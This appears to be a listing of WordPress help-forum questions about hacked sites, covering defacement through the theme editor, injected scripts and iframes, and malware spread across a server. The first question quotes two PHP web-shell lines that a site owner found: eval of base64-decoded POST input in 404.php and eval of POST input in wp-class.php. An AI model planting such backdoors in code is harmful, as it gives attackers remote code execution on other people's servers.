Articles of hacked

Suspicious Files

Hi, I found two suspicious files on my site. The first is in my theme (404.php), with this line added: <?php if ($_POST["php"]){eval(base64_decode($_POST["php"]));exit;} ?> The second is in /wp-admin/, called wp-class.php. The only line there was: <?eval($_POST[joao]);?> Can anyone tell me what these are doing, and what steps I should take?

Hack-Proof OR Security in WordPress — is it real?

For many years I’ve been using WordPress as a platform for websites; it is convenient for me as a developer and for customers. But in recent months, several of my clients’ sites were hacked and I’m concerned about this problem. If you do not consider the option of password brute-forcing, how can hackers get access to […]

Websites defaced by uploading script using theme editor

We’ve had several WordPress sites defaced, all of them having the same pattern (at least the raw access log says so). From the logs it appears they directly log in to WordPress, then go to theme editor > edit the 404.php file with malicious code; they now run the code to deface the site. Here […]

If a WP install is hacked, can it spread to other domains on a server?

I have a managed server with several WP and non-WP sites, and code has been prepended to the content of all files (for all domains on the server) which begin with a php command. I’m wondering whether the cause was a vulnerability or password-guess in one WP install, or instead a guess of the ftp […]

How was my WP site hacked

My site, http://www.cancer-study.com, has been hacked, and I can’t log in to wp-admin. Can you say how it has been hacked and what I can do to undo the damage? I have access to the host.

Site has no css on mobile

Our WP site got hacked and we’ve been working with our hosting to clean all malware etc. However, now the site appears on desktop fine, but on mobile it looks as though all the css is stripped. Here’s the site: http://italiancottage.pleaseproof.com/

Change WP-Login or WP-Admin

Can I change the name of the wp-login or wp-admin file so that I can go to a different filename in order to log in? I am trying to prevent hackers from finding my login and wp-login has become a very obvious option.

Hacked WordPress website, as notified by Google Search Console, what to do?

I just received a second email from Google Search Console, saying that one of my websites, Emma&Nala Jewelry, was hacked. In the email, they have sent two URLs that they found to be “suspicious”: http://emmaandnala.com/jlyesvgliktwgsg-b899-n26339-gslk/ and http://emmaandnala.com/n34104-kfkou-b890-xxptoayz/. The website config stats: Linux Hosting at Avalon hosting, Business package; WordPress 4.8, updated before this posting; Plugins: Akismet v3.3.3 […]

How do I disable/disallow <script> and <iframe> tags in TinyMCE?

A client of mine has just had 200 posts injected by malicious scripts and iframes. The website is now all cleared. They were put in the content by the user updating the post/page as my client’s computer was infected. (Though only in the TinyMCE editor – not any of the other custom fields assigned to […]

What should I do about hacked server?

My (managed) dedicated server, with several sites (not all of which use WP) has been hacked. Obfuscated code has been appended to all files (including WP core/plugin/theme and non-WP stuff) for which the content begins with a php command (and not simply all files with a .php suffix). It doesn’t seem to affect the rendered […]